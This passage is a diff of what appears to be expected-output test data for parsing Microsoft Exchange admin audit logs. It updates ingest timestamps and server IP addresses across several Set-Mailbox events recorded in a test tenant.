@@ -3755,8 +3755,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177697900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853210Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -3776,12 +3776,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3824,7 +3824,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -3836,8 +3836,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177700500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853215800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -3857,12 +3857,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3905,7 +3905,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -3917,8 +3917,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177703600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853221900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -3938,12 +3938,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3986,7 +3986,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -3998,8 +3998,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177706400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853227700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4019,12 +4019,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4067,7 +4067,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4079,8 +4079,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177709800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853233400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4100,12 +4100,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4148,7 +4148,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4160,8 +4160,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177713400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
